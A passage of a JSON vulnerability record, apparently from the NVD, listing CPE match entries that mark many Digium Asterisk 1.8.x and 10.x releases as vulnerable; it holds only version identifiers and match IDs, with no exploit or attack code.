              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA60A9C9-C2EF-4971-BEFB-FF687DAEF2F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BAFB22FA-CC24-4AFE-AC83-2D044563F7CE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "00F3EB0D-7C63-46B5-BA95-8486B9716C78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "00C1BF3B-7593-478D-9AAA-153901C70286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "82423EC2-FA29-4AF6-86C3-6AC6DFDC4DC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F86406A-0936-4A06-88FB-4137A64498EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "672CE4C0-EBD6-470B-937E-810FF1C4CDBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88DB1105-74D8-4312-9D02-D1E21F2E785C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "404C0557-6229-4D90-BFDD-54AFFCCE6A19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6D1D26CC-891F-4396-B7D7-30D712829E71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B61EA-F4D1-452A-9D96-B8DFDD719B0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9324AB96-EC99-4F04-A0A9-00F936C86EFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1B8B5E76-4A74-4E88-8A6F-C23538B7642A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BDB6BBCA-47CE-49B8-9706-AFDE4BE46550",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "8BFF65E2-692B-4C39-88FC-6DED8D9A7258",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5260E309-9320-4DB8-A918-7D215BF95D2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "60AFF340-A866-4CFE-9334-53B95FD4AA59",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "74E50309-CD7D-41F7-97DA-A7E451D0796A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6FD3F8F8-820E-4C29-9F8F-023D1DB999CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "C33A6419-0D00-49D6-9A48-2B633610AAED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "447E07C9-4A25-418D-B53F-609B78EE4C21",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8E8AE686-B618-4B0D-BD27-1F96295E964D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9751C0A-84F5-4A43-8282-12A9DE559569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F67E2694-F6F1-482C-91F2-D9FD856EA31B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E2D53AA-8D50-445F-9500-2F580F260DC0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D9D7D88-D64F-4F54-8C84-6AC45FBD36F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F67AB282-591C-4ED7-9750-C593A38D5D7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C9F8F881-2BF7-44AB-8756-54A06801EB11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "36EFF3C4-4D00-4BC5-94B9-403BB00C6AB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5E434F10-395E-426E-A988-4CDA504577D0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "8880AE7C-3E44-4B76-B500-E93868D4CF5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7C94269D-A271-42AC-A44C-102C814E564B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E7E5B826-D3D5-4D2D-BB4D-2C1BEDE92456",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BA564F7-7A69-4805-8C8C-C2EB5E12A6E2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF6FA464-F9D3-4674-844B-A2B2E2C42A51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "44722C8B-BB37-4444-A58A-F01D0B3B4DDA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C4FABFDB-D99A-4F83-8FEE-3BFA36BA4061",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A842E112-8974-4E74-AD56-1DEF5B5DD9F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9ACBC01-8A9D-43A5-A825-1CC9670417A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61E7199F-EACE-431A-8ADD-B96A6FCDBC49",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA7CD0E5-8E69-43B5-A5FF-8B122475CC00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F4BEA1B2-2103-4E25-92A9-DB107D6D4AD5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.16.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "2AD9AFFB-F903-43DD-9C1D-4D8E83EA25C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F368897-A481-42DD-A8B0-8AD43A5FD68B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BA8F4AF-26C0-4A69-B489-16E7A56E5123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FE82D53D-092D-4B36-A979-23E9A5E07A78",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "27365383-72DB-4683-9A67-CF553FF2620A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46EE63D4-CA9C-4DF4-AF85-B8AC2E3F844A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "91407E03-4E98-4DD9-B584-E5BB74F09B9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "669CC22C-45E5-40AB-9A95-D7DFD694B688",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54A934AE-AB7C-4D10-8BA2-9C54410C648F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7A7C5A8E-35E6-4B86-8502-1970031AB987",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687ED3CE-67C4-410D-8AF4-C769015598F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "30E918CD-89C4-42DA-9709-E50E0A3FA736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "DA57FA15-D0D7-4A97-9C25-6F6566940098",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A1C45300-A2CF-40E7-AB67-23DC24C31A1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "958081DC-1D77-45CD-A940-C7A1AB42C7BA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "298A879D-4F65-4523-A752-D17C4F81B822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "37AB07BE-54C4-4972-A05F-D1E2CF4363CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EBC63564-A84E-463D-8312-DDF1C6B7796F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "62A0906E-B631-4F3A-9ABC-9A43A43220BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C6314ADA-2849-416D-966E-C01C322EF904",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8B6CB1DD-614A-4B3D-99AE-9B1341427024",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CC95B04F-3746-4F1C-8428-A1FA10253E14",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "20819080-E0AB-4879-B4CF-A154D6F7EF6F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6C45753-E2CC-4F7C-B8DA-3D8CF255EA22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5A080197-D6AA-4FDC-888E-51D1C8251E34",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "1F08D930-D4C1-4C63-875C-171C46AE97C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1AA43D7D-AEAD-47CB-BFA5-B73004A1A7A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "B5ED5F6F-166D-4610-8939-A33AD45F1ADE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D40002A-564E-425C-BA2A-7C4A8F8DAFD7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "521C4DB2-7127-4BA9-94FC-AB0E9E06FE2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8C905DC1-8AB8-4D83-BB5B-FA4DABC58229",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "ECC74B5D-97A1-46FF-AFA3-5D5E4A0BF3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2D98C7C-94A8-4348-AF22-04A41FB6F8EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "85D39A99-E9A6-4860-BC61-56CA2FC3238B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "845DA0A4-1983-4E82-99C8-B7FBF47C632E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5A63FBB7-F1CF-4603-848F-980742D2ED36",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "10B2084F-3AF4-4008-899C-6C1E43715201",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "217C13A5-9F8A-4392-858F-2FC88B03EB0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "6B282462-900C-492E-98DE-65364E62F5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "687784F0-9ACC-435D-81F9-1E1B0F61010C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9D7D020C-FE32-408B-BE37-58835FD3D95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "39B7938F-7370-4F67-B0CD-1C14DE2E4E7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC587195-5973-423B-8BF9-3E0B27363B76",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.5.2:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "E65E012A-49B6-4796-B1FA-A83C9248D0EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FBE5780-D503-46D1-BE04-4CB7B662B5DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "9F4C24B7-22E3-4E56-9B9F-414101B627FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CB19323D-208F-45F9-85F3-BAA5D1BC3AA6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "09334CAB-9ADB-49BB-BE83-BBAC6A7A9F47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DC6DEEF5-7277-4E38-9233-E3612CD77CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.6.1:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "1813B898-F957-40D7-AF9A-064FB57D5C82",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "75A0D613-3D04-4902-9707-E743F30CF1A5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.0:*:digiumphones:*:*:*:*:*",
              "matchCriteriaId": "C5D07DB0-7C6A-4490-8FD0-DC83568E0421",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "54AB61A7-E143-4BEC-8658-68FF615B007E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F5552D1C-C05A-4B67-A025-BBD3022C7B9A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9B7F8B72-EEC9-4021-B320-8CB6E83856F4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "38A0F946-6A51-4E4D-8E8A-CA6DF222289F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9C7619B8-B986-4B24-BFFD-956A1A6780FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "21CF339A-A38B-40CE-9811-A6CE77B29025",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "13856847-32A8-401D-A6DC-8DB96AE739FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C8E8F4ED-AA7B-4B19-8416-6BC0608C760D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "B7A900B2-0F3C-450E-8933-BDD5C9627EA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "0992625B-012F-40EA-9A20-6352E633F62B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*",
